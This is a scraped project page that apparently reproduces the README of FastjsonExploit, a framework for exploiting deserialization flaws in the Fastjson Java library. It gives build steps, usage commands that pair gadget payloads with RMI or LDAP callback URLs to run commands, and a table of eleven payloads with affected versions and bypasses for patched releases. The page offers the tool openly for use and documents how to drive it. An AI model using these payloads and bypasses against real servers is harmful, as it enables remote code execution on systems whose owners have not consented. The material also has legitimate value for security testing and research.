Need help with FastjsonExploit?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

c0ny1
585 Stars 109 Forks 7 Commits 6 Opened issues

Description

Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)

Services available

!
?

Need anything else?

Contributors list

FastjonExploit | Fastjson漏洞快速利用框架

0x01 Introduce

FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:

  1. 一键生成利用payload,并启动所有利用环境。
  2. 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)

0x02 Buiding

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

0x03 Usage

.---- -. -. . . . ( .',----- - - ' ' _/ ;--:-\ -------------------- U__n_^_''[. |ooo___ | |!||!||!||!| | c(_ ..(_ ..(_ ..( /,,,,,,] | |||||||| | ,__________'|,L______],|__| /;(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o)

FastjsonExploit is a Fastjson library vulnerability exploit framework Author:c0ny1

Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command] Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc" Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java" Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc" Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types: Payload PayloadType VulVersion Dependencies
------- ----------- ---------- ------------
BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4 BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4 JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4
JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass
JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass
JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass
JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass
JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0
SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE
TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)

0x04 Notice

  • 帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!

0x05 Reference

  • https://github.com/frohoff/ysoserial
  • https://github.com/mbechler/marshalsec
  • https://github.com/kxcode/JNDI-Exploit-Bypass-Demo

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.